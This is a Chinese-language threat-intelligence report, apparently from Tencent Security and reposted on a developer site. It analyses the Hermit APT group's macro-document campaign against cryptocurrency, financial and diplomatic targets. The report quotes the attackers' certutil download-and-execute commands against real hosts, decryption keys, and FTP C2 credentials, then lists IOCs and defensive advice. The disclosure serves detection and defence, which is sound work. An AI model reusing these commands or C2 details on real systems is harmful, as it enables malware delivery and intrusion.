内容简介:腾讯安全御见威胁情报中心曾在2018年12月发布了分析文章:《Hermit(隐士):针对朝鲜半岛的APT攻击活动披露》。近期,腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。本次攻击活动跟之前的活动相比,技术手段类似,但是也有一定的更新,如通过下载新的doc文档来完成后续的攻击以及使用AMADEY家族的木马。而最终的目标依然为运行开源的babyface远控木马。此外,传统的Syscon/
一、背景
腾讯安全御见威胁情报中心曾在2018年12月发布了分析文章:《Hermit(隐士):针对朝鲜半岛的APT攻击活动披露》。近期,腾讯安全御见威胁情报中心再次监测到该组织的新活动。通过分析和溯源,我们发现该攻击活动主要针对区块链、数字货币、金融目标等,但是我们也发现了同样针对外交实体的一些攻击活动。
本次攻击活动跟之前的活动相比,技术手段类似,但是也有一定的更新,如通过下载新的doc文档来完成后续的攻击以及使用AMADEY家族的木马。而最终的目标依然为运行开源的babyface远控木马。此外,传统的Syscon/Sandy家族的后门木马也依然在进行活跃。
二、攻击技术分析
1、攻击入口
本次攻击采用鱼叉攻击的方式,投递的攻击诱饵为doc文档,信息如下:
文件hash | 文件名 | 文件类型 | 文档作者 | 最后修改者 | 最后修改时间 | 上传到VT时间 |
---|---|---|---|---|---|---|
237026e58e0ac6ce109d874d43d3d64e | 20190429_13.doc | MS Word Document | BlueSky | BlueSky | 2019:04:29 07:22:00 | 2019-04-30 03:54:41 |
c0c007ce1a2d9fb8420c421d419f9f87 | 20190513_8.doc | MS Word Document | BlueSky | BlueSky | 2019:05:13 05:25:00 | 2019-05-15 05:22:20 |
以20190513_8.doc为例,运行文档后,首先会提示启用宏:
启用宏代码后,会从 http://fighiting1013.org/2/modif8.doc 下载回来一个新的doc文档,重命名为20190513-8.doc(跟文档同名),然后打开下载回来的文档并关闭原始文档:
modif8.doc打开后内容如下:
文档内容跟区块链信息相关:
打开文档后,同样提示启用宏。宏代码启用后,会执行以下命令:
cmd.exe /q /c copy /Y%windir%\System32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% &&ct -urlcache -split -f http://tgbabcrfv.1apps.com/1.txt && cd /d %TEMP%&& ren 1.txt 1.bat && del /f /q 1.txt && 1.bat
该命令首先将certutil.exe复制到%TEMP%目录下并命名为ct.exe,随后利用ct.exe去下载1.txt并拷贝为1.bat,删除1.txt后执行1.bat。
http://tgbabcrfv.1apps.com/1.txt 内容为:
1.bat批处理文件会去下载3.txt并解码重命名为setup.cab文件。然后解压安装cab文件到%TEMP%目录下,随后运行解压安装后的install.bat。
解码后为:
install.bat将victory.exe移动到 C:\Users\Public\Documents 目录下,并设置注册表自启:
2、植入的恶意文件分析
1) victory.exe分析
样本通过EnumWindows回调函数进行解密,并创建同名子进程,解密密钥为:”hmrdeuhnetfiovtyeftqodhguhvnqkqurpmaflrpbnyezvwi”:
对解密出来的PE分析,首先样本会对内置的硬编码进行解密:
并且收集本地机器信息,包括本地杀软信息:
收集完成后通过http post发送给服务器,服务器回传信息中包含进一步下载连接。下载地址为: http://fighiting1013.org/2/sp.exe
接收到服务器回传信息后,会去下载地址下载可执行程序并运行:
而通过访问该木马的C2,可以发现该木马为AMADEY家族的木马:
2) sp.exe分析
经过对sp.exe的分析,该RAT跟之前我们曝光的一样,同样为babyface远控:
C2为5.252.198.93:7337
木马向C2服务器发送数据
三、 关联分析
1、 同Hermit(隐士)行动的关系
无论是宏代码,还是解码方式,还是最终的脚本形式,都跟之前我们披露的Hermit(隐士)行动一致,而隐士行动跟syscon以及konni的关系,之前的文章已经有比较详细的描述,本文就不再赘述;
如之前的行动的执行脚本:
宏代码:
都跟本次的攻击活动类似。此外,作者的信息同样都为BlueSky:
而从基础设施上,依然喜欢使用一些动态的域名来进行攻击,如1apps、000webhostapp等。
当然,本次攻击行动跟之前比,在技术上也进行了一定小幅度的更新:
1) 采用下载新的文档的形式来执行恶意代码;
2) 采用商用的AMADEY家族木马来进行传播;
2、年初的syscon攻击活动
根据同样的宏特征、基础设施的特征,在腾讯安全御见大数据中心的样本库里,我们同样找到了年初的攻击活动。
攻击诱饵文档:
文件hash | 文件名 | 文件类型 | 文档作者 | 最后修改者 | 最后修改时间 | 上传到VT时间 |
---|---|---|---|---|---|---|
68b080cdc748e9357e75a65fba30eaa7 | igtaud.doc | MS Word Document | N/A | Windows User | 2019:01:21 23:36:00 | 2019-01-23 12:57:34 |
打开后,提示需要启用宏,且文档内容模糊:
启用宏后:
宏代码为:
与之前的攻击的宏代码相似似,本次攻击命令存放在 http://clean.1apps.com/1.txt
1.bat的主要功能是主要根据系统类型下载cab文件到本地展开执行,实现木马的安装。
木马核心功能:
经分析,本次使用的SYSCON后门使用ftp协议进行控制,这也是该后门最大的特点,木马首先会读取同目录下的同名ini文件,并将其解密得到存放C2地址的url链接: http://clean.1apps.com/4.txt ,将该文件下载解密后得到C2的地址,以及使用的ftp用户名和密码。
从同名.ini文件中读取配置信息,解密后得到一个url(这是本次版本最大的变化之处,之前解密后直接得到C2)
将url指向的文件下载回来存为temp.ini,使用相同的方法解密后得到C2:
其中,C2信息为:
FTP Server:ftpupload.net >>185.27.134.11 UserName:b9_23329410 PASS WORD:tailung
解密出配置信息后,通过运行systeminfo和tasklist命令来收集系统信息,收集后输出到temp.ini,并压缩上传到C2中,上传的文件名格式为to + 计算机名 + 时间:
上传systeminfo 、tasklist结果到C2,然后查找C2上的名为toeveryone 的文件,读取内容解密后得到命令进行命令分发:
所支持命令如下:
命令 | 功能 | |
---|---|---|
cmd /c | 带/user标志 | 以explorer权限执行命令 |
带/stext或> | 执行命令并把结果输出到temp.ini | |
不带任何标志 | WinExec执行指定命令 | |
pull | 上传指定文件 | |
chip | 通过修改配置文件实现修改木马C2 | |
put | 移动文件 |
相关的控制命令:
to everyone (0).txt:
用rundll32 加载%appdata%\Microsoft\Office\qsisxkey.dll调用SetupHook接口
to everyone (1).txt:上传%appdata%\Microsoft\Office\qsisxkey.txt
to everyone (2).txt:执行dir命令,列举目录%appdata%\Microsoft\Office\
to everyone (3).txt:删除%appdata%\Microsoft\Office\qsisxkey.txt
从本次的活动来看,所使用的恶意文件为该组织较传统的Syscon/Sandy木马。
3、更多的行动
从最终的c2:5.252.198.93,我们又关联到其他的攻击样本,
如:0072b08eb4c1fe2201c52e26833beeb0
该文件同样会下载txt并利用certutil.exe进行解密:
http://csewater.co.kr/workfolder/work/monitor/1.txt
http://csewater.co.kr/workfolder/work/monitor/setup.txt
下载回的内容如下:
解码后命名为setup.cab:
解压执行install.bat:
然后启动ntutil.exe:
ntutil.exe利用EnumWindows回调函数进行解密,解密出一个新的PE并创建同名子进程。解密key为:
“thxlezgblyteznaulbwwdzkczexrpbmatepgzkqjyttbbsav”
对解密后的样本为一样为Babyface:
C2为解密后的winnet.ini中的内容:5.252.198.93:7337
同样,我们将该行动归属到本次的隐士行动中。而根据该文件,我们又扩展得到大量的文件,且均可归属到该行动中。而从诱饵内容来看,都跟朝鲜半岛的数字货币、金融等相关,跟本次攻击行动的一致。
如:3e4015366126dcdbdcc8b5c508a6d25c
执行命令:C:\WINDOWS\system32\cmd.exe /c C: && cd %TEMP% &&certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt && ren1.txt 1.bat && 1.bat && exit
诱饵内容:
如:dabccfdd50e593a8cb961a39296f0edf
执行命令:
C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -fhttps://071790.000webhostapp.com/vic/1.txt && ren 1.txt 1.bat&& 1.bat && exit
诱饵内容:
又如:268fb8da9c7d4c18d0ea1e9a3cbbc449
执行命令:
C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -f http://s8877.1apps.com/vip/1.txt&& ren 1.txt 1.bat && 1.bat && exit
诱饵内容:
又如:f2d2a2ea4654b2369378fae0b4b9574d
执行命令:
C:\Windows\system32\cmd.exe /c C: && cd%TEMP% && certutil -urlcache -split -f http://a7788.1apps.com/att/1.txt&& ren 1.txt 1.bat && 1.bat && exit
诱饵内容:
4、同TA505的关系
我们发现,本次的诱饵内容同TA505的诱饵类似:
如文件:51ce85fdf98e29acf3cce5493888b6bb
而前段时间,TA505同样使用AMADEY家族的木马来进行传播。
此外,TA505同样被认为是一支来自于朝鲜半岛的攻击组织,组织目标为金融、数字货币等,跟该攻击活动也有一定的重合。
当然我们也暂未发现更多的强证据来证明TA505同隐士的关系,我们也会持续保持跟踪。
四、 解决方案
Hermit(隐士)的活跃地区为世界热点地区,离我国很近,我们提醒国内有关单位、企业在日常工作中,注意采取一些必要的安全措施,防止成为APT攻击的受害者:
1、不要打开不明来源的邮件附件;
2、及时打系统补丁和重要软件的补丁;
3、小心处理Office文档,除非确认文档来源可靠,充分了解打开文档的后果,否则务必不要开启Office启用宏代码;
4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;
5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
五、 附录
1、IOCs
MD5:
c0c007ce1a2d9fb8420c421d419f9f87 c0c007ce1a2d9fb8420c421d419f9f87 9768b1208506e7f026625be173cdb2ee a59dbf872d4d275415caed24f93a4d02 eb800f555ad690d99d34b1a3b05f610a a9bd8c69ba5ea70002e776c9f618157b 43cbadadaead6f11295bf8843bd909ed 68b080cdc748e9357e75a65fba30eaa7 2df5a0be61f9b09f380a3fc20945afc0 ed527d42819ad7ed9bbaa2791e8bb445 46f3540f9a850d3114261e9f1c88100d 63dc47d134d7dade7fa3e290d879eba4 5968b80e0567a25909273ccf3527dd83 63dc47d134d7dade7fa3e290d879eba4 ed527d42819ad7ed9bbaa2791e8bb445 a5406729bf6acda782022ac5486436c3 a9bd8c69ba5ea70002e776c9f618157b 3e4015366126dcdbdcc8b5c508a6d25c 7d842177155e20b7b42b0a68ba9081e3 f2d2a2ea4654b2369378fae0b4b9574d dabccfdd50e593a8cb961a39296f0edf d896402609e63fc48c7f2433b10c1038 f38d61237d4ecfb87b58cfcd4fd9dd44 c2c2a8e9c5b8298d77a225bf3476b7ae 268fb8da9c7d4c18d0ea1e9a3cbbc449 fb42ddf48bc581fb9aa8d13f1e4636d1
C&C:
tgbabcrfv.1apps.com fighiting1013.org charley-online.com 5.252.198.93:7337 alabamaok0515.1apps.com mail.naver-download.com clean.1apps.com ftpupload.net s8877.1apps.com hanbosston.000webhostapp.com a7788.1apps.com/att 071790.000webhostapp.com attach10132.1apps.com 881.000webhostapp.com
pdb:
c:\miniprojects\x86il\il86\x64\release\IL86.pdb D:\Attack\DropperBuild\x64\Release\Dropper.pdb
2、参考链接
1) Hermit(隐士):针对朝鲜半岛的APT攻击活动披露
https://s.tencent.com/research/report/613.html2) SANNY Malware Delivery Method Updated in Recently Observed Attacks
https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html3) TA505 intensifica ciberataques a Chile y Latinoamérica con#FlawedAmmy
https://medium.com/@1ZRR4H/ta505-intensifica-ciberataques-a-chile-y-latinoam%C3%A9rica-con-flawedammy-9fb92c2f05524) 한국어 구사 Konni 조직,블루 스카이 작전 ‘Amadey’ 러시아 봇넷 활용
https://blog.alyac.co.kr/2308*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 巨杉TechDay:云时代的数据库架构设计与演进 预约报名-巨杉技术社区活动-活动行
- 团队建设活动:巅峰故事
- c++ 投掷活动物体
- 100+个裂变活动后
- 利用机器学习检测恶意活动
- HNS Botnet 最近活动更新
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。